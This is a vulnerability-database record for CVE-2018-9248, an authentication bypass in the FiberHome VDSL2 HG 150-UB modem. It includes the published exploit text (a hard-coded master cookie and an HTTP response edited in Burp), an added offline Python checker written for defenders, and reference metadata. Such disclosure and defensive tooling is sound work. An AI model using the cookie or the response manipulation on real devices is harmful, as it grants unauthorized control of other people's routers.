ID
VAR-E-201804-0344
CVE
cve_id: | CVE-2018-9248 | Trust: 1.5 |
EDB ID
44413
TITLE
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass. CVE-2018-9248. webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | fiberhome | model: | vdsl2 modem hg 150-ub | scope: | - | version: | - | Trust: 1.6 |
vendor: | fiberhome | model: | vdsl2 modem hg 150-ub login | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
# Exploit Title: FiberHome VDSL2 Modem HG 150-UB Authentication Bypass
# Date: 04/03/2018
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.fiberhome.com/
# CVE : CVE-2018-9248, CVE-2018-9248
The vulnerability lies in a plain-text, hard-coded cookie. Using any
cookie manager extension, an attacker can bypass the login page by setting the
following Master Cookie.
Cookie: Name=0admin
Then access the homepage, which will no longer require authentication.
http://192.168.10.1/
Due to the improper session implementation, there is another way to bypass
the login. The response header of the homepage without authentication looks like
this.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html><head><script language='javascript'>
parent.location='login.html'
</script></head><body></body></html>HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
The response header looks totally messed up, and using Burp Suite to
modify it to the following will grant access to the homepage without
authentication.
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Tue, 03 Apr 2018 18:33:12 GMT
Set-Cookie: Name=; path=/
Content-Type: text/html
Connection: close
<html>
<head>
.. continue to actual homepage source
Trust: 1.0
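A defender-side check for the second issue described above, as an added example that is not part of the original advisory or the vendor's code: it parses a captured unauthenticated response offline and flags a login gate that is only a client-side redirect followed by page content on the same connection. The sample captures (including the `<title>` text and the 302 response) are constructed, and the function names are hypothetical.

```python
import re

# Constructed sample modelled on the response shown above: a login redirect
# followed, on the same connection, by a second response with the real page.
SAMPLE_LEAKY = (
    b"HTTP/1.1 200 Ok\r\nServer: micro_httpd\r\nSet-Cookie: Name=; path=/\r\n"
    b"Content-Type: text/html\r\nConnection: close\r\n\r\n"
    b"<html><head><script language='javascript'>\nparent.location='login.html'\n"
    b"</script></head><body></body></html>"
    b"HTTP/1.1 200 Ok\r\nServer: micro_httpd\r\nContent-Type: text/html\r\n"
    b"Connection: close\r\n\r\n<html>\n<head>\n<title>Home</title>\n"
)
# Constructed sample of a server-side redirect that sends nothing else.
SAMPLE_CLEAN = (
    b"HTTP/1.1 302 Found\r\nLocation: /login.html\r\nContent-Length: 0\r\n"
    b"Connection: close\r\n\r\n"
)

STATUS_LINE = re.compile(rb"HTTP/1\.[01] \d{3} [^\r\n]*\r?\n")
REDIRECT_JS = re.compile(rb"location\s*=\s*['\"]login\.html['\"]", re.I)

def split_responses(raw):
    """Split a captured byte stream at every HTTP status line."""
    starts = [m.start() for m in STATUS_LINE.finditer(raw)]
    return [raw[a:b] for a, b in zip(starts, starts[1:] + [len(raw)])]

def body_of(response):
    """Return the bytes after the first blank line (header/body separator)."""
    parts = re.split(rb"\r?\n\r?\n", response, maxsplit=1)
    return parts[1] if len(parts) == 2 else b""

def audit(raw):
    """Return a list of findings for one unauthenticated capture."""
    findings = []
    responses = split_responses(raw)
    if len(responses) > 1:
        findings.append("multiple responses on one 'Connection: close' stream")
    for i, resp in enumerate(responses):
        if REDIRECT_JS.search(body_of(resp)):
            findings.append(f"response {i}: login enforced only by client-side redirect")
            trailing = b"".join(body_of(r) for r in responses[i + 1:]).strip()
            if trailing:
                findings.append(f"{len(trailing)} bytes of page content follow the redirect")
    return findings

if __name__ == "__main__":
    for name, raw in (("leaky", SAMPLE_LEAKY), ("clean", SAMPLE_CLEAN)):
        print(name, audit(raw) or "no findings")
```

Any finding on an unauthenticated capture means the authorization decision is being left to the browser; the fix belongs in the firmware, which should stop writing to the socket after the redirect.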
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Authentication Bypass
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | bypass | Trust: 0.5 |
CREDITS
Noman Riffat
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 44413 | Trust: 1.6 |
db: | NVD | id: | CVE-2018-9248 | Trust: 1.5 |
db: | EDBNET | id: | 97384 | Trust: 0.6 |
db: | PACKETSTORM | id: | 147045 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2018-9248 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/44413/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 147045 |
db: | EXPLOIT-DB | id: | 44413 |
db: | EDBNET | id: | 97384 |
LAST UPDATE DATE
2022-07-27T09:58:21.645000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 147045 | date: | 2018-04-04T20:49:01 |
db: | EXPLOIT-DB | id: | 44413 | date: | 2018-04-06T00:00:00 |
db: | EDBNET | id: | 97384 | date: | 2018-04-06T00:00:00 |